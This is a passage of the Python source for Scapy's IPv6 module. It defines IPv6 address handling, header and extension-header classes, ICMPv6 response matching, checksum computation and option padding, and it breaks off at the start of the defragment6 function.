1#! /usr/bin/env python 2############################################################################# 3## ## 4## inet6.py --- IPv6 support for Scapy ## 5## see http://natisbad.org/IPv6/ ## 6## for more informations ## 7## ## 8## Copyright (C) 2005 Guillaume Valadon <guedou@hongo.wide.ad.jp> ## 9## Arnaud Ebalard <arnaud.ebalard@eads.net> ## 10## ## 11## This program is free software; you can redistribute it and/or modify it ## 12## under the terms of the GNU General Public License version 2 as ## 13## published by the Free Software Foundation. ## 14## ## 15## This program is distributed in the hope that it will be useful, but ## 16## WITHOUT ANY WARRANTY; without even the implied warranty of ## 17## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## 18## General Public License for more details. ## 19## ## 20############################################################################# 21 22""" 23IPv6 (Internet Protocol v6). 24""" 25 26 27from __future__ import absolute_import 28from __future__ import print_function 29 30from hashlib import md5 31import random 32import re 33import socket 34import struct 35from time import gmtime, strftime 36 37import scapy.modules.six as six 38from scapy.modules.six.moves import range, zip 39if not socket.has_ipv6: 40 raise socket.error("can't use AF_INET6, IPv6 is disabled") 41if not hasattr(socket, "IPPROTO_IPV6"): 42 # Workaround for http://bugs.python.org/issue6926 43 socket.IPPROTO_IPV6 = 41 44if not hasattr(socket, "IPPROTO_IPIP"): 45 # Workaround for https://bitbucket.org/secdev/scapy/issue/5119 46 socket.IPPROTO_IPIP = 4 47 48from scapy.arch import get_if_hwaddr 49from scapy.config import conf 50from scapy.base_classes import Gen 51from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ 52 MTU 53from scapy.compat import chb, orb, raw, plain_str 54import scapy.consts 55from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ 56 DestField, Field, FieldLenField, 
FlagsField, IntField, LongField, \ 57 MACField, PacketLenField, PacketListField, ShortEnumField, ShortField, \ 58 StrField, StrFixedLenField, StrLenField, X3BytesField, XBitField, \ 59 XIntField, XShortField 60from scapy.packet import bind_layers, Packet, Raw 61from scapy.volatile import RandInt, RandIP6, RandShort 62from scapy.sendrecv import sendp, sniff, sr, srp1 63from scapy.as_resolvers import AS_resolver_riswhois 64from scapy.supersocket import SuperSocket, L3RawSocket 65from scapy.utils6 import in6_6to4ExtractAddr, in6_and, in6_cidr2mask, \ 66 in6_getnsma, in6_getnsmac, in6_isaddr6to4, in6_isaddrllallnodes, \ 67 in6_isaddrllallservers, in6_isaddrTeredo, in6_isllsnmaddr, in6_ismaddr, \ 68 in6_ptop, teredoAddrExtractInfo 69from scapy.layers.l2 import CookedLinux, Ether, GRE, Loopback, SNAP 70from scapy.layers.inet import IP, IPTools, TCP, TCPerror, TracerouteResult, \ 71 UDP, UDPerror 72from scapy.utils import checksum, inet_pton, inet_ntop, strxor 73from scapy.error import warning 74if conf.route6 is None: 75 # unused import, only to initialize conf.route6 76 import scapy.route6 77 78 79############################################################################# 80# Helpers ## 81############################################################################# 82 83def get_cls(name, fallback_cls): 84 return globals().get(name, fallback_cls) 85 86 87########################## 88## Neighbor cache stuff ## 89########################## 90 91conf.netcache.new_cache("in6_neighbor", 120) 92 93@conf.commands.register 94def neighsol(addr, src, iface, timeout=1, chainCC=0): 95 """Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with specified IPv6 address addr 96 97 'src' address is used as source of the message. Message is sent on iface. 98 By default, timeout waiting for an answer is 1 second. 99 100 If no answer is gathered, None is returned. Else, the answer is 101 returned (ethernet frame). 
102 """ 103 104 nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr)) 105 d = inet_ntop(socket.AF_INET6, nsma) 106 dm = in6_getnsmac(nsma) 107 p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255) 108 p /= ICMPv6ND_NS(tgt=addr) 109 p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface)) 110 res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0, 111 chainCC=chainCC) 112 113 return res 114 115@conf.commands.register 116def getmacbyip6(ip6, chainCC=0): 117 """Returns the MAC address corresponding to an IPv6 address 118 119 neighborCache.get() method is used on instantiated neighbor cache. 120 Resolution mechanism is described in associated doc string. 121 122 (chainCC parameter value ends up being passed to sending function 123 used to perform the resolution, if needed) 124 """ 125 126 if isinstance(ip6, Net6): 127 ip6 = str(ip6) 128 129 if in6_ismaddr(ip6): # Multicast 130 mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6)) 131 return mac 132 133 iff,a,nh = conf.route6.route(ip6) 134 135 if iff == scapy.consts.LOOPBACK_INTERFACE: 136 return "ff:ff:ff:ff:ff:ff" 137 138 if nh != '::': 139 ip6 = nh # Found next hop 140 141 mac = conf.netcache.in6_neighbor.get(ip6) 142 if mac: 143 return mac 144 145 res = neighsol(ip6, a, iff, chainCC=chainCC) 146 147 if res is not None: 148 if ICMPv6NDOptDstLLAddr in res: 149 mac = res[ICMPv6NDOptDstLLAddr].lladdr 150 else: 151 mac = res.src 152 conf.netcache.in6_neighbor[ip6] = mac 153 return mac 154 155 return None 156 157 158############################################################################# 159############################################################################# 160### IPv6 addresses manipulation routines ### 161############################################################################# 162############################################################################# 163 164class Net6(Gen): # syntax ex. 
fec0::/126 165 """Generate a list of IPv6s from a network address or a name""" 166 name = "ipv6" 167 ip_regex = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$") 168 169 def __init__(self, net): 170 self.repr = net 171 172 tmp = net.split('/')+["128"] 173 if not self.ip_regex.match(net): 174 tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0] 175 176 netmask = int(tmp[1]) 177 self.net = inet_pton(socket.AF_INET6, tmp[0]) 178 self.mask = in6_cidr2mask(netmask) 179 self.plen = netmask 180 181 def __iter__(self): 182 183 def parse_digit(value, netmask): 184 netmask = min(8, max(netmask, 0)) 185 value = int(value) 186 return (value & (0xff << netmask), 187 (value | (0xff >> (8 - netmask))) + 1) 188 189 self.parsed = [ 190 parse_digit(x, y) for x, y in zip( 191 struct.unpack("16B", in6_and(self.net, self.mask)), 192 (x - self.plen for x in range(8, 129, 8)), 193 ) 194 ] 195 196 def rec(n, l): 197 sep = ':' if n and n % 2 == 0 else '' 198 if n == 16: 199 return l 200 return rec(n + 1, [y + sep + '%.2x' % i 201 # faster than '%s%s%.2x' % (y, sep, i) 202 for i in range(*self.parsed[n]) 203 for y in l]) 204 205 return iter(rec(0, [''])) 206 207 def __str__(self): 208 try: 209 return next(self.__iter__()) 210 except StopIteration: 211 return None 212 213 def __eq__(self, other): 214 return str(other) == str(self) 215 216 def __ne__(self, other): 217 return str(other) != str(self) 218 219 def __repr__(self): 220 return "Net6(%r)" % self.repr 221 222 223 224 225 226 227############################################################################# 228############################################################################# 229### IPv6 Class ### 230############################################################################# 231############################################################################# 232 233class IP6Field(Field): 234 def __init__(self, name, default): 235 Field.__init__(self, name, default, "16s") 236 def h2i(self, pkt, x): 237 if 
isinstance(x, str): 238 try: 239 x = in6_ptop(x) 240 except socket.error: 241 x = Net6(x) 242 elif isinstance(x, list): 243 x = [Net6(a) for a in x] 244 return x 245 def i2m(self, pkt, x): 246 return inet_pton(socket.AF_INET6, plain_str(x)) 247 def m2i(self, pkt, x): 248 return inet_ntop(socket.AF_INET6, x) 249 def any2i(self, pkt, x): 250 return self.h2i(pkt,x) 251 def i2repr(self, pkt, x): 252 if x is None: 253 return self.i2h(pkt,x) 254 elif not isinstance(x, Net6) and not isinstance(x, list): 255 if in6_isaddrTeredo(x): # print Teredo info 256 server, _, maddr, mport = teredoAddrExtractInfo(x) 257 return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport) 258 elif in6_isaddr6to4(x): # print encapsulated address 259 vaddr = in6_6to4ExtractAddr(x) 260 return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr) 261 return self.i2h(pkt, x) # No specific information to return 262 def randval(self): 263 return RandIP6() 264 265class SourceIP6Field(IP6Field): 266 __slots__ = ["dstname"] 267 def __init__(self, name, dstname): 268 IP6Field.__init__(self, name, None) 269 self.dstname = dstname 270 def i2m(self, pkt, x): 271 if x is None: 272 dst=getattr(pkt,self.dstname) 273 iff,x,nh = conf.route6.route(dst) 274 return IP6Field.i2m(self, pkt, x) 275 def i2h(self, pkt, x): 276 if x is None: 277 if conf.route6 is None: 278 # unused import, only to initialize conf.route6 279 import scapy.route6 280 dst = ("::" if self.dstname is None else getattr(pkt, self.dstname)) 281 if isinstance(dst, (Gen, list)): 282 r = {conf.route6.route(daddr) for daddr in dst} 283 if len(r) > 1: 284 warning("More than one possible route for %r" % (dst,)) 285 x = min(r)[1] 286 else: 287 x = conf.route6.route(dst)[1] 288 return IP6Field.i2h(self, pkt, x) 289 290class DestIP6Field(IP6Field, DestField): 291 bindings = {} 292 def __init__(self, name, default): 293 IP6Field.__init__(self, name, None) 294 DestField.__init__(self, name, default) 295 def i2m(self, pkt, x): 296 if x is 
None: 297 x = self.dst_from_pkt(pkt) 298 return IP6Field.i2m(self, pkt, x) 299 def i2h(self, pkt, x): 300 if x is None: 301 x = self.dst_from_pkt(pkt) 302 return IP6Field.i2h(self, pkt, x) 303 304ipv6nh = { 0:"Hop-by-Hop Option Header", 305 4:"IP", 306 6:"TCP", 307 17:"UDP", 308 41:"IPv6", 309 43:"Routing Header", 310 44:"Fragment Header", 311 47:"GRE", 312 50:"ESP Header", 313 51:"AH Header", 314 58:"ICMPv6", 315 59:"No Next Header", 316 60:"Destination Option Header", 317 112:"VRRP", 318 132:"SCTP", 319 135:"Mobility Header"} 320 321ipv6nhcls = { 0: "IPv6ExtHdrHopByHop", 322 4: "IP", 323 6: "TCP", 324 17: "UDP", 325 43: "IPv6ExtHdrRouting", 326 44: "IPv6ExtHdrFragment", 327 #50: "IPv6ExtHrESP", 328 #51: "IPv6ExtHdrAH", 329 58: "ICMPv6Unknown", 330 59: "Raw", 331 60: "IPv6ExtHdrDestOpt" } 332 333class IP6ListField(StrField): 334 __slots__ = ["count_from", "length_from"] 335 islist = 1 336 def __init__(self, name, default, count_from=None, length_from=None): 337 if default is None: 338 default = [] 339 StrField.__init__(self, name, default) 340 self.count_from = count_from 341 self.length_from = length_from 342 343 def i2len(self, pkt, i): 344 return 16*len(i) 345 346 def i2count(self, pkt, i): 347 if isinstance(i, list): 348 return len(i) 349 return 0 350 351 def getfield(self, pkt, s): 352 c = l = None 353 if self.length_from is not None: 354 l = self.length_from(pkt) 355 elif self.count_from is not None: 356 c = self.count_from(pkt) 357 358 lst = [] 359 ret = b"" 360 remain = s 361 if l is not None: 362 remain,ret = s[:l],s[l:] 363 while remain: 364 if c is not None: 365 if c <= 0: 366 break 367 c -= 1 368 addr = inet_ntop(socket.AF_INET6, remain[:16]) 369 lst.append(addr) 370 remain = remain[16:] 371 return remain+ret,lst 372 373 def i2m(self, pkt, x): 374 s = b"" 375 for y in x: 376 try: 377 y = inet_pton(socket.AF_INET6, y) 378 except: 379 y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0] 380 y = inet_pton(socket.AF_INET6, y) 381 s += y 382 return s 
383 384 def i2repr(self,pkt,x): 385 s = [] 386 if x == None: 387 return "[]" 388 for y in x: 389 s.append('%s' % y) 390 return "[ %s ]" % (", ".join(s)) 391 392class _IPv6GuessPayload: 393 name = "Dummy class that implements guess_payload_class() for IPv6" 394 def default_payload_class(self,p): 395 if self.nh == 58: # ICMPv6 396 t = orb(p[0]) 397 if len(p) > 2 and (t == 139 or t == 140): # Node Info Query 398 return _niquery_guesser(p) 399 if len(p) >= icmp6typesminhdrlen.get(t, float("inf")): # Other ICMPv6 messages 400 return get_cls(icmp6typescls.get(t,"Raw"), "Raw") 401 return Raw 402 elif self.nh == 135 and len(p) > 3: # Mobile IPv6 403 return _mip6_mhtype2cls.get(orb(p[2]), MIP6MH_Generic) 404 elif self.nh == 43 and orb(p[2]) == 4: # Segment Routing header 405 return IPv6ExtHdrSegmentRouting 406 return get_cls(ipv6nhcls.get(self.nh, "Raw"), "Raw") 407 408class IPv6(_IPv6GuessPayload, Packet, IPTools): 409 name = "IPv6" 410 fields_desc = [ BitField("version" , 6 , 4), 411 BitField("tc", 0, 8), #TODO: IPv6, ByteField ? 
412 BitField("fl", 0, 20), 413 ShortField("plen", None), 414 ByteEnumField("nh", 59, ipv6nh), 415 ByteField("hlim", 64), 416 SourceIP6Field("src", "dst"), # dst is for src @ selection 417 DestIP6Field("dst", "::1") ] 418 419 def route(self): 420 dst = self.dst 421 if isinstance(dst,Gen): 422 dst = next(iter(dst)) 423 return conf.route6.route(dst) 424 425 def mysummary(self): 426 return "%s > %s (%i)" % (self.src, self.dst, self.nh) 427 428 def post_build(self, p, pay): 429 p += pay 430 if self.plen is None: 431 l = len(p) - 40 432 p = p[:4]+struct.pack("!H", l)+p[6:] 433 return p 434 435 def extract_padding(self, s): 436 l = self.plen 437 return s[:l], s[l:] 438 439 def hashret(self): 440 if self.nh == 58 and isinstance(self.payload, _ICMPv6): 441 if self.payload.type < 128: 442 return self.payload.payload.hashret() 443 elif (self.payload.type in [133,134,135,136,144,145]): 444 return struct.pack("B", self.nh)+self.payload.hashret() 445 446 if not conf.checkIPinIP and self.nh in [4, 41]: # IP, IPv6 447 return self.payload.hashret() 448 449 nh = self.nh 450 sd = self.dst 451 ss = self.src 452 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting): 453 # With routing header, the destination is the last 454 # address of the IPv6 list if segleft > 0 455 nh = self.payload.nh 456 try: 457 sd = self.addresses[-1] 458 except IndexError: 459 sd = '::1' 460 # TODO: big bug with ICMPv6 error messages as the destination of IPerror6 461 # could be anything from the original list ... 
462 if 1: 463 sd = inet_pton(socket.AF_INET6, sd) 464 for a in self.addresses: 465 a = inet_pton(socket.AF_INET6, a) 466 sd = strxor(sd, a) 467 sd = inet_ntop(socket.AF_INET6, sd) 468 469 if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrSegmentRouting): 470 # With segment routing header (rh == 4), the destination is 471 # the first address of the IPv6 addresses list 472 try: 473 sd = self.addresses[0] 474 except IndexError: 475 sd = self.dst 476 477 if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment): 478 nh = self.payload.nh 479 480 if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop): 481 nh = self.payload.nh 482 483 if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): 484 foundhao = None 485 for o in self.payload.options: 486 if isinstance(o, HAO): 487 foundhao = o 488 if foundhao: 489 nh = self.payload.nh # XXX what if another extension follows ? 490 ss = foundhao.hoa 491 492 if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd): 493 sd = inet_pton(socket.AF_INET6, sd) 494 ss = inet_pton(socket.AF_INET6, self.src) 495 return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret() 496 else: 497 return struct.pack("B", nh)+self.payload.hashret() 498 499 def answers(self, other): 500 if not conf.checkIPinIP: # skip IP in IP and IPv6 in IP 501 if self.nh in [4, 41]: 502 return self.payload.answers(other) 503 if isinstance(other, IPv6) and other.nh in [4, 41]: 504 return self.answers(other.payload) 505 if isinstance(other, IP) and other.proto in [4, 41]: 506 return self.answers(other.payload) 507 if not isinstance(other, IPv6): # self is reply, other is request 508 return False 509 if conf.checkIPaddr: 510 # ss = inet_pton(socket.AF_INET6, self.src) 511 sd = inet_pton(socket.AF_INET6, self.dst) 512 os = inet_pton(socket.AF_INET6, other.src) 513 od = inet_pton(socket.AF_INET6, other.dst) 514 # request was sent to a multicast address (other.dst) 515 # Check reply destination addr matches request source 
addr (i.e 516 # sd == os) except when reply is multicasted too 517 # XXX test mcast scope matching ? 518 if in6_ismaddr(other.dst): 519 if in6_ismaddr(self.dst): 520 if ((od == sd) or 521 (in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))): 522 return self.payload.answers(other.payload) 523 return False 524 if (os == sd): 525 return self.payload.answers(other.payload) 526 return False 527 elif (sd != os): # or ss != od): <- removed for ICMP errors 528 return False 529 if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128: 530 # ICMPv6 Error message -> generated by IPv6 packet 531 # Note : at the moment, we jump the ICMPv6 specific class 532 # to call answers() method of erroneous packet (over 533 # initial packet). There can be cases where an ICMPv6 error 534 # class could implement a specific answers method that perform 535 # a specific task. Currently, don't see any use ... 536 return self.payload.payload.answers(other) 537 elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop): 538 return self.payload.answers(other.payload.payload) 539 elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment): 540 return self.payload.answers(other.payload.payload) 541 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting): 542 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting 543 elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrSegmentRouting): 544 return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting 545 elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt): 546 return self.payload.payload.answers(other.payload.payload) 547 elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance 548 return self.payload.payload.answers(other.payload) 549 else: 550 if (self.nh != other.nh): 551 return False 552 return 
self.payload.answers(other.payload) 553 554 555class _IPv46(IP): 556 """ 557 This class implements a dispatcher that is used to detect the IP version 558 while parsing Raw IP pcap files. 559 """ 560 @classmethod 561 def dispatch_hook(cls, _pkt=None, *_, **kargs): 562 if _pkt: 563 if orb(_pkt[0]) >> 4 == 6: 564 return IPv6 565 elif kargs.get("version") == 6: 566 return IPv6 567 return IP 568 569 570def inet6_register_l3(l2, l3): 571 return getmacbyip6(l3.dst) 572conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3) 573 574 575class IPerror6(IPv6): 576 name = "IPv6 in ICMPv6" 577 def answers(self, other): 578 if not isinstance(other, IPv6): 579 return False 580 sd = inet_pton(socket.AF_INET6, self.dst) 581 ss = inet_pton(socket.AF_INET6, self.src) 582 od = inet_pton(socket.AF_INET6, other.dst) 583 os = inet_pton(socket.AF_INET6, other.src) 584 585 # Make sure that the ICMPv6 error is related to the packet scapy sent 586 if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128: 587 588 # find upper layer for self (possible citation) 589 selfup = self.payload 590 while selfup is not None and isinstance(selfup, _IPv6ExtHdr): 591 selfup = selfup.payload 592 593 # find upper layer for other (initial packet). 
Also look for RH 594 otherup = other.payload 595 request_has_rh = False 596 while otherup is not None and isinstance(otherup, _IPv6ExtHdr): 597 if isinstance(otherup, IPv6ExtHdrRouting): 598 request_has_rh = True 599 otherup = otherup.payload 600 601 if ((ss == os and sd == od) or # <- Basic case 602 (ss == os and request_has_rh)): # <- Request has a RH : 603 # don't check dst address 604 605 # Let's deal with possible MSS Clamping 606 if (isinstance(selfup, TCP) and 607 isinstance(otherup, TCP) and 608 selfup.options != otherup.options): # seems clamped 609 610 # Save fields modified by MSS clamping 611 old_otherup_opts = otherup.options 612 old_otherup_cksum = otherup.chksum 613 old_otherup_dataofs = otherup.dataofs 614 old_selfup_opts = selfup.options 615 old_selfup_cksum = selfup.chksum 616 old_selfup_dataofs = selfup.dataofs 617 618 # Nullify them 619 otherup.options = [] 620 otherup.chksum = 0 621 otherup.dataofs = 0 622 selfup.options = [] 623 selfup.chksum = 0 624 selfup.dataofs = 0 625 626 # Test it and save result 627 s1 = raw(selfup) 628 s2 = raw(otherup) 629 l = min(len(s1), len(s2)) 630 res = s1[:l] == s2[:l] 631 632 # recall saved values 633 otherup.options = old_otherup_opts 634 otherup.chksum = old_otherup_cksum 635 otherup.dataofs = old_otherup_dataofs 636 selfup.options = old_selfup_opts 637 selfup.chksum = old_selfup_cksum 638 selfup.dataofs = old_selfup_dataofs 639 640 return res 641 642 s1 = raw(selfup) 643 s2 = raw(otherup) 644 l = min(len(s1), len(s2)) 645 return s1[:l] == s2[:l] 646 647 return False 648 649 def mysummary(self): 650 return Packet.mysummary(self) 651 652 653############################################################################# 654############################################################################# 655### Upper Layer Checksum computation ### 656############################################################################# 657############################################################################# 658 
class PseudoIPv6(Packet):  # IPv6 Pseudo-header for checksum computation
    name = "Pseudo IPv6 Header"
    fields_desc = [ IP6Field("src", "::"),
                    IP6Field("dst", "::"),
                    ShortField("uplen", None),
                    BitField("zero", 0, 24),
                    ByteField("nh", 0) ]

def in6_chksum(nh, u, p):
    """
    As Specified in RFC 2460 - 8.1 Upper-Layer Checksums

    Performs IPv6 Upper Layer checksum computation. Provided parameters are:
    - 'nh' : value of upper layer protocol
    - 'u'  : upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be
             provided with all under layers (IPv6 and all extension headers,
             for example)
    - 'p'  : the payload of the upper layer provided as a string

    Functions operate by filling a pseudo header class instance (PseudoIPv6)
    with
    - Next Header value
    - the address of _final_ destination (if some Routing Header with a
      non-null segleft field and a non-empty address list is present in
      underlayer classes, its last address is used; for a Segment Routing
      Header its first address is used. The header closest to the upper
      layer wins.)
    - the address of _real_ source (basically the source address of an
      IPv6 class instance available in the underlayer or the source address
      in HAO option if some Destination Option header found in underlayer
      includes this option as its only option).
    - the length is the length of provided payload string ('p')

    Returns the checksum, or 0 (after emitting a warning) when no IPv6
    layer is found below 'u'.
    """

    ph6 = PseudoIPv6()
    ph6.nh = nh
    rthdr = 0
    hahdr = 0
    final_dest_addr_found = 0
    # Walk down the layers until the IPv6 header, collecting the final
    # destination and home address on the way.
    while u is not None and not isinstance(u, IPv6):
        if (isinstance(u, IPv6ExtHdrRouting) and
            u.segleft != 0 and len(u.addresses) != 0 and
            final_dest_addr_found == 0):
            rthdr = u.addresses[-1]
            final_dest_addr_found = 1
        elif (isinstance(u, IPv6ExtHdrSegmentRouting) and
              u.segleft != 0 and len(u.addresses) != 0 and
              final_dest_addr_found == 0):
            rthdr = u.addresses[0]
            final_dest_addr_found = 1
        elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
              isinstance(u.options[0], HAO)):
            hahdr = u.options[0].hoa
        u = u.underlayer
    if u is None:
        warning("No IPv6 underlayer to compute checksum. Leaving null.")
        return 0
    ph6.src = hahdr if hahdr else u.src
    ph6.dst = rthdr if rthdr else u.dst
    ph6.uplen = len(p)
    ph6s = raw(ph6)
    return checksum(ph6s+p)


#############################################################################
#############################################################################
###                         Extension Headers                            ###
#############################################################################
#############################################################################


# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
    name = 'Abstract IPV6 Option Header'
    aliastypes = [IPv6, IPerror6]  # TODO ...
737 738 739#################### IPv6 options for Extension Headers ##################### 740 741_hbhopts = { 0x00: "Pad1", 742 0x01: "PadN", 743 0x04: "Tunnel Encapsulation Limit", 744 0x05: "Router Alert", 745 0x06: "Quick-Start", 746 0xc2: "Jumbo Payload", 747 0xc9: "Home Address Option" } 748 749class _OTypeField(ByteEnumField): 750 """ 751 Modified BytEnumField that displays information regarding the IPv6 option 752 based on its option type value (What should be done by nodes that process 753 the option if they do not understand it ...) 754 755 It is used by Jumbo, Pad1, PadN, RouterAlert, HAO options 756 """ 757 pol = {0x00: "00: skip", 758 0x40: "01: discard", 759 0x80: "10: discard+ICMP", 760 0xC0: "11: discard+ICMP not mcast"} 761 762 enroutechange = {0x00: "0: Don't change en-route", 763 0x20: "1: May change en-route" } 764 765 def i2repr(self, pkt, x): 766 s = self.i2s.get(x, repr(x)) 767 polstr = self.pol[(x & 0xC0)] 768 enroutechangestr = self.enroutechange[(x & 0x20)] 769 return "%s [%s, %s]" % (s, polstr, enroutechangestr) 770 771class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option 772 name = "Scapy6 Unknown Option" 773 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 774 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 775 StrLenField("optdata", "", 776 length_from = lambda pkt: pkt.optlen) ] 777 def alignment_delta(self, curpos): # By default, no alignment requirement 778 """ 779 As specified in section 4.2 of RFC 2460, every options has 780 an alignment requirement ususally expressed xn+y, meaning 781 the Option Type must appear at an integer multiple of x octest 782 from the start of the header, plus y octet. 783 784 That function is provided the current position from the 785 start of the header and returns required padding length. 
786 """ 787 return 0 788 789class Pad1(Packet): # IPv6 Hop-By-Hop Option 790 name = "Pad1" 791 fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ] 792 def alignment_delta(self, curpos): # No alignment requirement 793 return 0 794 795class PadN(Packet): # IPv6 Hop-By-Hop Option 796 name = "PadN" 797 fields_desc = [_OTypeField("otype", 0x01, _hbhopts), 798 FieldLenField("optlen", None, length_of="optdata", fmt="B"), 799 StrLenField("optdata", "", 800 length_from = lambda pkt: pkt.optlen)] 801 def alignment_delta(self, curpos): # No alignment requirement 802 return 0 803 804class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option 805 name = "Router Alert" 806 fields_desc = [_OTypeField("otype", 0x05, _hbhopts), 807 ByteField("optlen", 2), 808 ShortEnumField("value", None, 809 { 0: "Datagram contains a MLD message", 810 1: "Datagram contains RSVP message", 811 2: "Datagram contains an Active Network message", 812 68: "NSIS NATFW NSLP", 813 69: "MPLS OAM", 814 65535: "Reserved" })] 815 # TODO : Check IANA has not defined new values for value field of RouterAlertOption 816 # TODO : Now that we have that option, we should do something in MLD class that need it 817 # TODO : IANA has defined ranges of values which can't be easily represented here. 
class _HopByHopOptionsField(PacketListField):
    """
    List of options carried by a Hop-by-Hop or Destination Options header.

    Dissection picks the option class from the first octet of each option
    (through the module-level _hbhoptcls table) and falls back on the
    field's default class. Building inserts Pad1/PadN options so that every
    option honours its own alignment_delta() and the resulting options area
    ends on an 8-octet boundary, unless the owning packet disables 'autopad'.

    'curpos' is the offset at which the options start inside the extension
    header; alignment is computed relative to it.
    """
    __slots__ = ["curpos"]

    def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
        self.curpos = curpos
        PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)

    @staticmethod
    def _padding(size):
        """Return the padding option(s) used to fill 'size' octets."""
        if size == 0:
            return b""
        if size == 1:
            # A single octet can only be filled with Pad1
            return raw(Pad1())
        # PadN carries 2 octets of header (type + length) on its own
        return raw(PadN(optdata=b'\x00' * (size - 2)))

    def i2len(self, pkt, i):
        """Length in octets of the built options, padding included."""
        return len(self.i2m(pkt, i))

    def i2count(self, pkt, i):
        """Number of options held by the field (0 when 'i' is not a list)."""
        if isinstance(i, list):
            return len(i)
        return 0

    def getfield(self, pkt, s):
        """
        Dissect options out of 's'.

        Returns a (remaining bytes, list of option packets) tuple. When
        length_from is set, only that many octets are considered; otherwise
        count_from (if set) bounds the number of options parsed.
        """
        c = l = None
        if self.length_from is not None:
            l = self.length_from(pkt)
        elif self.count_from is not None:
            c = self.count_from(pkt)

        opt = []
        ret = b""
        x = s
        if l is not None:
            x, ret = s[:l], s[l:]
        while x:
            if c is not None:
                if c <= 0:
                    break
                c -= 1
            o = orb(x[0])  # Option type
            cls = _hbhoptcls.get(o, self.cls)
            try:
                op = cls(x)
            except Exception:
                # The dedicated class could not dissect the option: fall
                # back on the generic one. KeyboardInterrupt and SystemExit
                # are deliberately not intercepted.
                op = self.cls(x)
            opt.append(op)
            if isinstance(op.payload, conf.raw_layer):
                # What the option did not consume holds the next options
                x = op.payload.load
                del(op.payload)
            else:
                x = b""
        return x + ret, opt

    def i2m(self, pkt, x):
        """
        Build the options list 'x' into bytes.

        With autopad disabled the options are simply concatenated; with
        autopad enabled (the default when 'pkt' has no such attribute)
        Pad1/PadN options are inserted before each option as required by
        its alignment_delta(), then at the end to reach a multiple of 8.
        """
        try:
            autopad = getattr(pkt, "autopad")  # Hack : 'autopad' phantom field
        except Exception:
            autopad = 1

        if not autopad:
            # raw() and not str(): the result must be the wire bytes of each
            # option, and b"".join() rejects str objects on Python 3.
            return b"".join(map(raw, x))

        curpos = self.curpos
        chunks = []
        for p in x:
            d = p.alignment_delta(curpos)
            curpos += d
            chunks.append(self._padding(d))
            pstr = raw(p)
            curpos += len(pstr)
            chunks.append(pstr)

        # Let's make the class including our option field
        # a multiple of 8 octets long
        d = curpos % 8
        if d != 0:
            chunks.append(self._padding(8 - d))

        return b"".join(chunks)

    def addfield(self, pkt, s, val):
        """Append the built options to the bytes built so far."""
        return s + self.i2m(pkt, val)
class IPv6ExtHdrSegmentRoutingTLV(Packet):
    """
    Generic TLV of the Segment Routing header.

    Also acts as the dispatcher for TLV variants: classes recorded in
    'registered_sr_tlv' are selected from the first octet of the data to
    dissect, this class being the fallback.
    """
    name = "IPv6 Option Header Segment Routing - Generic TLV"
    fields_desc = [
        ByteField("type", 0),
        ByteField("len", 0),
        ByteField("reserved", 0),
        ByteField("flags", 0),
        StrLenField("value", "", length_from=lambda pkt: pkt.len),
    ]

    # TLV type octet -> class handling it. Shared by all subclasses unless
    # one of them rebinds the attribute.
    registered_sr_tlv = {}

    def extract_padding(self, p):
        # Nothing after the TLV fields belongs to this TLV: return an empty
        # first element and hand 'p' back untouched as the second one.
        return b"", p

    @classmethod
    def register_variant(cls):
        """Record 'cls' under the default value of its 'type' field."""
        # NOTE(review): presumably called by scapy when a subclass is
        # created -- confirm against the Packet metaclass.
        type_value = cls.type.default
        cls.registered_sr_tlv[type_value] = cls

    @classmethod
    def dispatch_hook(cls, pkt=None, *args, **kargs):
        """Return the class to instantiate for the data 'pkt'."""
        if not pkt:
            # No data to look at: nothing to dispatch on
            return cls
        return cls.registered_sr_tlv.get(orb(pkt[0]), cls)
def defragment6(packets):
    """
    Performs defragmentation of a list of IPv6 packets. Packets are reordered.
